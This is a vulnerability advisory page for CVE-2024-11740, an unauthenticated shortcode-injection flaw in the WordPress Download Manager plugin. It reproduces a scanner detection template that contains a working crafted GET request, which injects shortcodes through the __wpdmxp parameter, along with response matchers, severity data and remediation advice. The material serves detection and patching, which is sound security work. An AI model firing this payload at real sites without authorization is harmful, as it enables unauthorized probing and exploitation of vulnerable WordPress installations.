CVE-2024-11740: Download Manager < 3.3.04 - Unauthenticated Arbitrary Shortcode Execution

2025-08-01 Download Manager PoC Public

Description

The The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.

PoC

id: CVE-2024-11740

info:
  name: Download Manager < 3.3.04 - Unauthenticated Arbitrary Shortcode Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
  impact: |
    Unauthenticated attackers can execute arbitrary shortcodes which may expose sensitive information or perform unauthorized actions.
  remediation: |
    Update Download Manager plugin to version 3.3.04 or later.
  reference:
    - https://github.com/advisories/GHSA-cq39-wq4r-hjrj
    - https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.02/src/Package/Hooks.php#L42
    - https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.02/src/Package/views/shortcode-iframe.php#L203
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a7be578-5883-4cd3-963d-bf81c3af2003?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-11740
    cwe-id: CWE-94
    epss-score: 0.01888
    epss-percentile: 0.78483
    cpe: cpe:2.3:a:wpdownloadmanager:download_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpdownloadmanager
    product: download_manager
    framework: wordpress
    publicwww-query: "/wp-content/plugins/download-manager/"
  tags: cve,cve2024,wordpress,wp-plugin,download-manager,short-code,wp,vkev,vuln

http:
  - raw:
      - |
        GET /?__wpdmxp=%27][/wpdm_package][wpdm_all_packages][wpdm_package%20id=%27 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"wpdm-all-packages"'
          - 'wpdm-download-link download-on-click'
        condition: and

      - type: word
        part: body
        words:
          - 'No Packages Found'
        negative: true
# digest: 4a0a004730450220209ca5ec18d668802bd50167ccf698b244c93a43e34ddb408f7347aca5b2d715022100c7ff39c038f76a111bec63e863c39c634a3e4dc0e349a0f4a72c6a9013e08d6c:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities